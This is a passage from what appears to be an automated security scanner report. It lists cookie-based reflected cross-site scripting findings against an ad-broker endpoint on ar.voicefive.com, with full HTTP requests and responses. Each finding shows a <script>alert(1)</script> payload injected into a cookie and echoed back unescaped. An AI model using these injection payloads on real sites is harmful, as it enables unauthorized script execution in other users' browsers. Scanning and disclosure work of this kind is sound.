This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a61c2<script>alert(1)</script>8ddd6783f06; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a61c2<script>alert(1)</script>8ddd6783f06', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

5.224. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 50744<script>alert(1)</script>dc76054891d was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&50744<script>alert(1)</script>dc76054891d; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&50744<script>alert(1)</script>dc76054891d', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.225. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 7f012<script>alert(1)</script>9fa647b77a8 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&7f012<script>alert(1)</script>9fa647b77a8; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&7f012<script>alert(1)</script>9fa647b77a8', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

5.226. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 5ebca<script>alert(1)</script>e6b432fdeff was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5ebca<script>alert(1)</script>e6b432fdeff; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5ebca<script>alert(1)</script>e6b432fdeff', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=
...[SNIP]...

5.227. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload bcd1d<script>alert(1)</script>3f482f6797c was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735225&AR_C=206438317 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://realestate.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&bcd1d<script>alert(1)</script>3f482f6797c; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557108%2E102%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:59:35 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=35&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:59:35 2011&prad=253735225&arc=206438317&; expires=Wed 03-Aug-2011 00:59:35 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25826

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735225",Pid:"p97174789",Arc:"206438317",Location:
...[SNIP]...
D%3E%2D1%2Cts%2D%3E1304557108%2E102%2Cwait%2D%3E10000%2C', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&bcd1d<script>alert(1)</script>3f482f6797c', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.228. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload cf13e<script>alert(1)</script>d0bbd35541 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&cf13e<script>alert(1)</script>d0bbd35541; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25609

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&cf13e<script>alert(1)</script>d0bbd35541', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

5.229. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload f38a5<script>alert(1)</script>c393d546009 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&f38a5<script>alert(1)</script>c393d546009; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&f38a5<script>alert(1)</script>c393d546009', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...

5.230. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 5becf<script>alert(1)</script>85729a22e32 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
